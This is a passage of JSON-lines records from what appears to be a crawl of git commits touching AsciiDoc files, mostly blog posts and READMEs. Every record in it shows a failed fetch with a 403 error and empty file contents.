'https:\/\/github.com\/robinverduijn\/gradle.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f3d3fa35ce065cc880fdd7cb63cc319830500a68","subject":"y2b create post iPhone 4S vs iPhone 4 Speed Benchmarks","message":"y2b create post iPhone 4S vs iPhone 4 Speed Benchmarks","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-10-11-iPhone-4S-vs-iPhone-4-Speed-Benchmarks.adoc","new_file":"_posts\/2011-10-11-iPhone-4S-vs-iPhone-4-Speed-Benchmarks.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d4183e6521974f1717545ad8c676cc4749360453","subject":"SWARM-i1618: Fixed documentation typos.","message":"SWARM-i1618: Fixed documentation typos.\n\nMotivation\n----------\nTo fix typos in the documentation\n\nModifications\n-------------\nDocumentation only\n\nResult\n------\nNo changes to product behaviour - documentation 
only\n","repos":"nelsongraca\/wildfly-swarm,juangon\/wildfly-swarm,wildfly-swarm\/wildfly-swarm-core,nelsongraca\/wildfly-swarm,wildfly-swarm\/wildfly-swarm,wildfly-swarm\/wildfly-swarm,nelsongraca\/wildfly-swarm,wildfly-swarm\/wildfly-swarm-core,kenfinnigan\/wildfly-swarm,juangon\/wildfly-swarm,nelsongraca\/wildfly-swarm,nelsongraca\/wildfly-swarm,wildfly-swarm\/wildfly-swarm-core,wildfly-swarm\/wildfly-swarm,wildfly-swarm\/wildfly-swarm,wildfly-swarm\/wildfly-swarm-core,juangon\/wildfly-swarm,kenfinnigan\/wildfly-swarm,kenfinnigan\/wildfly-swarm,kenfinnigan\/wildfly-swarm,wildfly-swarm\/wildfly-swarm,wildfly-swarm\/wildfly-swarm-core,juangon\/wildfly-swarm,kenfinnigan\/wildfly-swarm,juangon\/wildfly-swarm","old_file":"docs\/howto\/create-a-fraction\/index.adoc","new_file":"docs\/howto\/create-a-fraction\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wildfly-swarm\/wildfly-swarm.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9f84ba930057dbb89457eb456bda5c5965cc221f","subject":"Update 2018-08-10-P-W-A-for-mahjong.adoc","message":"Update 2018-08-10-P-W-A-for-mahjong.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-10-P-W-A-for-mahjong.adoc","new_file":"_posts\/2018-08-10-P-W-A-for-mahjong.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2e5a26ec52a68e731008e933ef8bfccbd7f0459b","subject":"innodb_stats_on_metadata","message":"innodb_stats_on_metadata\n","repos":"mlocati\/MyDevelopmentEnvironment,mlocati\/MyDevelopmentEnvironment,mlocati\/MyDevelopmentEnvironment","old_file":"src\/sections\/08-install-mysql.adoc","new_file":"src\/sections\/08-install-mysql.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mlocati\/MyDevelopmentEnvironment.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"99e5dd9e0c9e1dcc30af209e8a635253809b3e01","subject":"docs: add first parts of asciidoc documentation","message":"docs: add first parts of asciidoc documentation\n","repos":"mjaschen\/phpgeo","old_file":"docs\/phpgeo.adoc","new_file":"docs\/phpgeo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mjaschen\/phpgeo.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3fac62b04f81cef70711da5ce9a1d044298b26a6","subject":"Update 2017-05-04-Clone-Duplicate-Node-with-Paragraphs-field-in-Drupal-8.adoc","message":"Update 2017-05-04-Clone-Duplicate-Node-with-Paragraphs-field-in-Drupal-8.adoc","repos":"kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io","old_file":"_posts\/2017-05-04-Clone-Duplicate-Node-with-Paragraphs-field-in-Drupal-8.adoc","new_file":"_posts\/2017-05-04-Clone-Duplicate-Node-with-Paragraphs-field-in-Drupal-8.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kunicmarko20\/kunicmarko20.github.io.git\/': The requested URL returned error: 
403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6a2ddc6b80e31271af57570cf8210a961416abb9","subject":"Update 2016-06-11-Main-Title-Subtitle.adoc","message":"Update 2016-06-11-Main-Title-Subtitle.adoc","repos":"LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io","old_file":"_posts\/2016-06-11-Main-Title-Subtitle.adoc","new_file":"_posts\/2016-06-11-Main-Title-Subtitle.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/LearningTools\/LearningTools.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6bf763309b6a0de19f79ec85571b12c0cf5ff3e8","subject":"Update 2017-03-14-Trying-out-OpenLDAP.adoc","message":"Update 2017-03-14-Trying-out-OpenLDAP.adoc","repos":"jsiu22\/blog,jsiu22\/blog,jsiu22\/blog,jsiu22\/blog","old_file":"_posts\/2017-03-14-Trying-out-OpenLDAP.adoc","new_file":"_posts\/2017-03-14-Trying-out-OpenLDAP.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jsiu22\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fc68f4732e57019ad3985413d48cabb6b1c2bf02","subject":"Update 2017-08-25-Thrasos-Secret-Code.adoc","message":"Update 2017-08-25-Thrasos-Secret-Code.adoc","repos":"thrasos\/thrasos.github.io,thrasos\/thrasos.github.io,thrasos\/thrasos.github.io,thrasos\/thrasos.github.io","old_file":"_posts\/2017-08-25-Thrasos-Secret-Code.adoc","new_file":"_posts\/2017-08-25-Thrasos-Secret-Code.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/thrasos\/thrasos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ca4039dce9741f44472ede190e2beb5b40388352","subject":"Publish 199399.adoc","message":"Publish 199399.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"199399.adoc","new_file":"199399.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b20940157f1ad6977b63da272450f18873c162ee","subject":"Update dbm-changelog-sync.adoc","message":"Update dbm-changelog-sync.adoc","repos":"jako512\/grails-database-migration,sbglasius\/grails-database-migration","old_file":"src\/docs\/asciidoc\/ref\/Maintenance Scripts\/dbm-changelog-sync.adoc","new_file":"src\/docs\/asciidoc\/ref\/Maintenance Scripts\/dbm-changelog-sync.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jako512\/grails-database-migration.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5a3ca539ae5cfab286776ef9dace7be682cad77d","subject":"Add initial structure for toolchains doc","message":"Add initial structure for toolchains 
doc\n","repos":"blindpirate\/gradle,blindpirate\/gradle,blindpirate\/gradle,gradle\/gradle,blindpirate\/gradle,gradle\/gradle,blindpirate\/gradle,blindpirate\/gradle,blindpirate\/gradle,gradle\/gradle,gradle\/gradle,gradle\/gradle,blindpirate\/gradle,gradle\/gradle,blindpirate\/gradle,gradle\/gradle,blindpirate\/gradle,gradle\/gradle,gradle\/gradle,gradle\/gradle","old_file":"subprojects\/docs\/src\/docs\/userguide\/jvm\/toolchains.adoc","new_file":"subprojects\/docs\/src\/docs\/userguide\/jvm\/toolchains.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blindpirate\/gradle.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5321d0dd893665985e11b203ccbab8c3ddfcb27f","subject":"add dutch clojure day 2019","message":"add dutch clojure day 2019\n","repos":"clojure\/clojure-site","old_file":"content\/events\/2019\/dutchclojureday.adoc","new_file":"content\/events\/2019\/dutchclojureday.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"cb2b34ad481c26b199d92e17518d49dd0251ec3d","subject":"y2b create post Apple iPhone 5 Unboxing (New iPhone 5 Unboxing \\u0026 Overview) [Launch Day iPhone 5 Unboxing]","message":"y2b create post Apple iPhone 5 Unboxing (New iPhone 5 Unboxing \\u0026 Overview) [Launch Day iPhone 5 Unboxing]","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-09-20-Apple-iPhone-5-Unboxing-New-iPhone-5-Unboxing-u0026-Overview-Launch-Day-iPhone-5-Unboxing.adoc","new_file":"_posts\/2012-09-20-Apple-iPhone-5-Unboxing-New-iPhone-5-Unboxing-u0026-Overview-Launch-Day-iPhone-5-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c2def022ae17aed853ef31acffde4b9b33be1777","subject":"Deadline","message":"Deadline\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Git\/Git branching 4.adoc","new_file":"Git\/Git branching 4.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c7a83555dc65edaf24cfa031eaa799ccf9977a67","subject":"y2b create post Fujifilm Instax 210 Unboxing + Close Ups!","message":"y2b create post Fujifilm Instax 210 Unboxing + Close Ups!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-01-19-Fujifilm-Instax-210-Unboxing--Close-Ups.adoc","new_file":"_posts\/2011-01-19-Fujifilm-Instax-210-Unboxing--Close-Ups.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0323934bd30460e15d7dcce95f3a7d243373c1e8","subject":"Update 2016-07-20-Adding-Dynamic-Filters-to-a-Leaflet-Map.adoc","message":"Update 
2016-07-20-Adding-Dynamic-Filters-to-a-Leaflet-Map.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-20-Adding-Dynamic-Filters-to-a-Leaflet-Map.adoc","new_file":"_posts\/2016-07-20-Adding-Dynamic-Filters-to-a-Leaflet-Map.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e162f09e5e41307c2eb1150eb2f785506a4b1a89","subject":"Explains city employee features.","message":"Explains city employee features.\n","repos":"CityOfNewYork\/NYCOpenRecords,CityOfNewYork\/NYCOpenRecords,CityOfNewYork\/NYCOpenRecords,CityOfNewYork\/NYCOpenRecords,CityOfNewYork\/NYCOpenRecords","old_file":"docs\/features.adoc","new_file":"docs\/features.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/CityOfNewYork\/NYCOpenRecords.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d012cdd26734f32130f1d14cfc4c2a37eb9b6e0c","subject":"Update 2017-02-04-Go.adoc","message":"Update 2017-02-04-Go.adoc","repos":"ovo-6\/ovo-6.github.io,ovo-6\/ovo-6.github.io,ovo-6\/ovo-6.github.io,ovo-6\/ovo-6.github.io","old_file":"_posts\/2017-02-04-Go.adoc","new_file":"_posts\/2017-02-04-Go.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ovo-6\/ovo-6.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1d5c90e7a1afe055ba8c5b8e24f4fe6b082e5eb3","subject":"Typo correction in readme.adoc","message":"Typo correction in readme.adoc","repos":"phgrosjean\/R-code","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/phgrosjean\/R-code.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8e52227a2da41193a9e3877cabc4670a7e381404","subject":"Added a README","message":"Added a README\n","repos":"feedhenry-raincatcher\/raincatcher-demo-mobile,feedhenry-raincatcher\/raincatcher-demo-mobile","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/feedhenry-raincatcher\/raincatcher-demo-mobile.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7646a369911e300bb153f6da94e99224507b37ec","subject":"Update README","message":"Update README\n\nSigned-off-by: Sebastian Davids <ad054bf4072605cd37d196cd013ffd05b05c77ca@gmx.de>\n","repos":"sdavids\/sdavids-commons-uuid,sdavids\/sdavids-commons-uuid","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sdavids\/sdavids-commons-uuid.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0c698139ed61bf48af582527a832a31a3825a582","subject":"Added twitter batch","message":"Added twitter 
batch","repos":"storozhukBM\/javaslang-circuitbreaker,RobWin\/circuitbreaker-java8,resilience4j\/resilience4j,drmaas\/resilience4j,javaslang\/javaslang-circuitbreaker,resilience4j\/resilience4j,mehtabsinghmann\/resilience4j,RobWin\/javaslang-circuitbreaker,drmaas\/resilience4j,goldobin\/resilience4j","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/resilience4j\/resilience4j.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"261fb08225c1b0fc28c2e63450e0be3c31e2bbeb","subject":"Readme fix","message":"Readme fix\n","repos":"drmaas\/resilience4j,resilience4j\/resilience4j,RobWin\/circuitbreaker-java8,goldobin\/resilience4j,drmaas\/resilience4j,javaslang\/javaslang-circuitbreaker,mehtabsinghmann\/resilience4j,RobWin\/javaslang-circuitbreaker,resilience4j\/resilience4j","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/resilience4j\/resilience4j.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"435c2338db6877e8c94e33d72fb60a52417180bd","subject":"fix data rest link on the readme page","message":"fix data rest link on the readme page","repos":"mygithubwork\/boot-works,verydapeng\/boot-works,verydapeng\/boot-works,mygithubwork\/boot-works","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mygithubwork\/boot-works.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5de2adf36a89261400ca597bcc9909c6474cf6e9","subject":"Add readme","message":"Add readme\n","repos":"antoyo\/relm,antoyo\/relm","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/antoyo\/relm.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"65f4ec2fe21dadff95b0ce36b96219dc5a460e8f","subject":"Initial import","message":"Initial import\n","repos":"roamingthings\/security-server,roamingthings\/security-server","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/roamingthings\/security-server.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5d0078b39ff50d1d6b6b5eb78a5a8a52ccdc1877","subject":"README initial commit","message":"README initial commit\n","repos":"tsegismont\/vertx-monitor","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tsegismont\/vertx-monitor.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"920bd8148a28af56b0edd33d933f08f48fc2e695","subject":"Update 2017-02-09-Distracted-confused-and-definately-not-about-XQuery.adoc","message":"Update 
2017-02-09-Distracted-confused-and-definately-not-about-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2017-02-09-Distracted-confused-and-definately-not-about-XQuery.adoc","new_file":"_posts\/2017-02-09-Distracted-confused-and-definately-not-about-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"790900504cdf4368e424e695c4cde39d7d015b94","subject":"chore(index): \u3082\u3046\u5c11\u3057\u5206\u304b\u308a\u3084\u3059\u304f\u30d0\u30b0\u3092\u6f70\u3057\u305f","message":"chore(index): \u3082\u3046\u5c11\u3057\u5206\u304b\u308a\u3084\u3059\u304f\u30d0\u30b0\u3092\u6f70\u3057\u305f\n\nhttps:\/\/twitter.com\/yuya_takeyama\/status\/480969917496176641\n","repos":"purepennons\/promises-book,purepennons\/promises-book,cqricky\/promises-book,purepennons\/promises-book,liyunsheng\/promises-book,tangjinzhou\/promises-book,genie88\/promises-book,wenber\/promises-book,charlenopires\/promises-book,liubin\/promises-book,cqricky\/promises-book,wangwei1237\/promises-book,charlenopires\/promises-book,wangwei1237\/promises-book,oToUC\/promises-book,wenber\/promises-book,dieface\/promises-book,cqricky\/promises-book,wangwei1237\/promises-book,mzbac\/promises-book,charlenopires\/promises-book,sunfurong\/promise,lidasong2014\/promises-book,oToUC\/promises-book,azu\/promises-book,wenber\/promises-book,azu\/promises-book,genie88\/promises-book,tangjinzhou\/promises-book,liubin\/promises-book,mzbac\/promises-book,oToUC\/promises-book,sunfurong\/promise,lidasong2014\/promises-book,genie88\/promises-book,sunfurong\/promise,lidasong2014\/promises-book,azu\/promises-book,xifeiwu\/promises-book,mzbac\/promises-book,dieface\/promises-book,tangjinzhou\/promises-book,azu\/promises-book,liyunsheng\/promises-book,dieface\/promises-book,xifeiwu\/promises-book,liyunsheng\/promises-book,liubin\/promises-book,xifeiwu\/promises-book","old_file":"index.adoc","new_file":"index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xifeiwu\/promises-book.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9fe3f137ba79ff47bcca1bdd6dab796d67107b3f","subject":"To adoc","message":"To adoc\n","repos":"tkmtwo\/tkmtwo-kavro","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tkmtwo\/tkmtwo-kavro.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8a9d93243559e8ce20ed8be49307f710d591985e","subject":"[fix] toc placement","message":"[fix] toc placement\n\n(Was my fault)\n\nhttps:\/\/www.jenkins.io\/doc\/developer\/publishing\/documentation\/#table-of-contents\n","repos":"netceler\/pipeline-maven-plugin,netceler\/pipeline-maven-plugin,jenkinsci\/pipeline-maven-plugin,jenkinsci\/pipeline-maven-plugin","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/netceler\/pipeline-maven-plugin.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"807c9300ad97d1e2e41fe929f2a050ae6f9354a7","subject":"add some documentation","message":"add some 
documentation\n","repos":"torstenwerner\/java-9-no-jar-hell,torstenwerner\/java-9-no-jar-hell","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/torstenwerner\/java-9-no-jar-hell.git\/': The requested URL returned error: 403\n","license":"unlicense","lang":"AsciiDoc"} {"commit":"bd53d88b567cc4722d40646d19c00f31211f37fb","subject":"Add README","message":"Add README\n","repos":"DavidGamba\/go-getoptions","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DavidGamba\/go-getoptions.git\/': The requested URL returned error: 403\n","license":"mpl-2.0","lang":"AsciiDoc"} {"commit":"ddb879a007efd0b14ad445543bd2c6a1ba55c8ce","subject":"Create new README file in asciidoctor format.","message":"Create new README file in asciidoctor format.","repos":"denarced\/stargate-atlantis-transcript,denarced\/stargate-atlantis-transcript","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/denarced\/stargate-atlantis-transcript.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e4fd831fed92e0eda46fdde563f3a3c28b3cc862","subject":"initial adoc documentation","message":"initial adoc documentation\n","repos":"aim42\/htmlSanityCheck,aim42\/htmlSanityCheck,aim42\/htmlSanityCheck","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/aim42\/htmlSanityCheck.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a84157ce81bebb4908c3e3b145903541800168a4","subject":"Update step order","message":"Update step order","repos":"jthmiranda\/javaee7-websocket,mgreau\/javaee7-websocket,jthmiranda\/javaee7-websocket,mgreau\/javaee7-websocket,jthmiranda\/javaee7-websocket,mgreau\/javaee7-websocket","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/javaee7-websocket.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9ca9db898d55a641e1484322529ddf9fd509ac6e","subject":"Add README.adoc","message":"Add README.adoc\n","repos":"techdev-solutions\/kotlin-intro,techdev-solutions\/kotlin-intro","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/techdev-solutions\/kotlin-intro.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f03566f40bb47b8906b4f72ad76e2b4d12fb287d","subject":"readme","message":"readme\n","repos":"codezork\/BlueNodes,codezork\/BlueNodes","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/codezork\/BlueNodes.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f86cb7470be1cbdafb16b8092f6a64436bf46f79","subject":"Added README as first specs","message":"Added README as first specs\n","repos":"CedricGatay\/manifest-mixin","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: 
unable to access 'https:\/\/github.com\/CedricGatay\/manifest-mixin.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9bb3613d392945e39c72a99b7ac84fc5d9a5efc8","subject":"docs(README): update the vagrant command adoc syntax","message":"docs(README): update the vagrant command adoc syntax\n","repos":"looztra\/mesos-marathon-chronos-in-a-box","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/looztra\/mesos-marathon-chronos-in-a-box.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"99f7e0d41902d78c81056d74f8c34971cbe29b43","subject":"Created symlink to README","message":"Created symlink to README\n","repos":"Yubico\/php-u2flib-server,shield-9\/php-u2flib-server,shield-9\/php-u2flib-server,Yubico\/php-u2flib-server","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/shield-9\/php-u2flib-server.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"f06a39ac31ad7178a446f35c6685866211b6672e","subject":"Add code coverage link\/icon","message":"Add code coverage link\/icon\n","repos":"hwolf\/oauth2,hwolf\/oauth2,hwolf\/oauth2,hwolf\/oauth2","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hwolf\/oauth2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"60d266ddf6900a18fb8d27b8195373ba1a0fd3d6","subject":"Remove the link to kythe-early-interest, as it is now unnecessary.","message":"Remove the link to kythe-early-interest, as it is now unnecessary.\n","repos":"kidaa\/kythe,bzz\/kythe,benjyw\/kythe,kythe\/kythe,kidaa\/kythe,benjyw\/kythe,benjyw\/kythe,bzz\/kythe,legrosbuffle\/kythe,kidaa\/kythe,Acidburn0zzz\/kythe,benjyw\/kythe,bowlofstew\/kythe,Acidburn0zzz\/kythe,bowlofstew\/kythe,legrosbuffle\/kythe,kythe\/kythe,benjyw\/kythe,benjyw\/kythe,legrosbuffle\/kythe,legrosbuffle\/kythe,kidaa\/kythe,legrosbuffle\/kythe,benjyw\/kythe,bzz\/kythe,kythe\/kythe,kythe\/kythe,benjyw\/kythe,bowlofstew\/kythe,kidaa\/kythe,legrosbuffle\/kythe,legrosbuffle\/kythe,kidaa\/kythe,bzz\/kythe,benjyw\/kythe,benjyw\/kythe,bowlofstew\/kythe,Acidburn0zzz\/kythe,benjyw\/kythe,bzz\/kythe,Acidburn0zzz\/kythe,kythe\/kythe,bowlofstew\/kythe,Acidburn0zzz\/kythe,legrosbuffle\/kythe,kidaa\/kythe,kidaa\/kythe,legrosbuffle\/kythe,bowlofstew\/kythe,bzz\/kythe,bzz\/kythe,Acidburn0zzz\/kythe,bzz\/kythe,Acidburn0zzz\/kythe,legrosbuffle\/kythe,kythe\/kythe,kythe\/kythe,kythe\/kythe,Acidburn0zzz\/kythe,bzz\/kythe,bzz\/kythe,Acidburn0zzz\/kythe,bzz\/kythe,benjyw\/kythe,bowlofstew\/kythe,bowlofstew\/kythe,bowlofstew\/kythe,bzz\/kythe,kythe\/kythe,bowlofstew\/kythe,kythe\/kythe,kidaa\/kythe,legrosbuffle\/kythe,kythe\/kythe,bowlofstew\/kythe","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/legrosbuffle\/kythe.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ef9ab541073bd31841f88413a85337d7a636f9c7","subject":"Switching to asciidoc","message":"Switching to 
asciidoc\n","repos":"lafent\/netc","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lafent\/netc.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"be111629ffdcdf531d55803507b039f5ac00281c","subject":"Update 2016-04-12-Puzzle-1-Please-call-my-A-P-Is.adoc","message":"Update 2016-04-12-Puzzle-1-Please-call-my-A-P-Is.adoc","repos":"puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io","old_file":"_posts\/2016-04-12-Puzzle-1-Please-call-my-A-P-Is.adoc","new_file":"_posts\/2016-04-12-Puzzle-1-Please-call-my-A-P-Is.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/puzzles-engineer\/puzzles-engineer.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c3e714bae5465e99de28a3b84133b22880857c55","subject":"Update 2017-04-22-Amazon-Redshift-Spectrum-C-S-V.adoc","message":"Update 